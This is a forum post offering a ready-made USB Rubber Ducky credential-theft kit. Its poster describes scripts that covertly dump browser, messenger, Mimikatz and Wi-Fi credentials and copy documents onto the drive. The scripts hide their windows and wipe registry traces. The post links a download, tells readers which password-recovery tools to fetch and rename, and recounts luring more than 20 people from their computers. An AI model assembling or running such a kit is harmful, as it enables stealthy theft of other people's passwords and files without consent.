caine1988 Posted March 4, 2017 Posted March 4, 2017 Hey Guys I thought I'd make some files available for those Guys out there who want it all the Link contains .bat files .exe files the "short" version of the ducky script the american keyboard inject.bin TWIN DUCK required and Drive named "_" so yes simply _ then copy paste all the files on the twin duck and create a folder named "slurp" yes simply slurp d.cmd.bat executes -webrowser password.exe and saves all passwords from browser to text file on drive -messenger.exe and saves messenger passwords to text file on drive i.vbs is copy paste / cscript / for running e.cmd.bat invisible e.cmd.bat is the slurp thats presented on this Forum set to slurp .pdf files form %USERPROFILE%/Documents on top it executes invoke mimikatz and drops creds on the drive as well and if thats not enough it dumbs all wifi creds onto the drive let the drive sit for at least 1 minutes the duck isnt the quickest one to slurp Whole thing takes about 60 seconds so not exactly the preferred approach considering the time but over the course of 20+ "test subjects" I have always managed to get individuals away from their machine for more then 3 minutes so I figured get it all is possible with a well planned social engineering approach its as stealthy as I needed it to be It deletes all registry paths and should not leave many traces runs with hidden or obfuscated windows Its not perfect by all means it can be simpler and the inject.bin can be made shorter the delays can be made shorter and unnecessary lines in the ducky script could be removed NONE of it is my work since I have gathered it over quite some time I cant recall everybody that played part in it and I apologize... I just tried my best to merge it all If someone wants to take this and make it better I would appreciate it very much (Be aware that the slurp of pdf files (e.cmd.bat will not work on machines with different language setup since the Folder might not be called "Documents e.g) I apologize in advance if I crossed any AGBs I understand if it gets taken down and I dont want to upset anybody just wanted to make a Rubber Ducky blackhole ready to launch for people whos skills end with flashing the duck I bow down to all of you who actually wrote programs and scripts that I included Here is the link just hope itll display all the files and makes them downloadable I honestly have no Idea if you guys can get all the files so here is the list d.cmd.bat e.cmd.bat i.vbs im.ps1 inject newmix3 short.bin < rename inject.bin (alright?...) L.exe.exe P.exe.exe newmix3 short.txt Yes L.exe.exe I know laugh it off haha "https://drive.google.com/drive/folders/0Byg3drYr22Kmd0VtcXpwVi1CT1k?usp=sharing" Quote
caine1988 Posted March 4, 2017 Author Posted March 4, 2017 .exe files not included so download WebBrowserPassView (just google) rename it p.exe (yes small p) and download mspass (google again) rename it L.exe (yes capital L) hope it will work Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.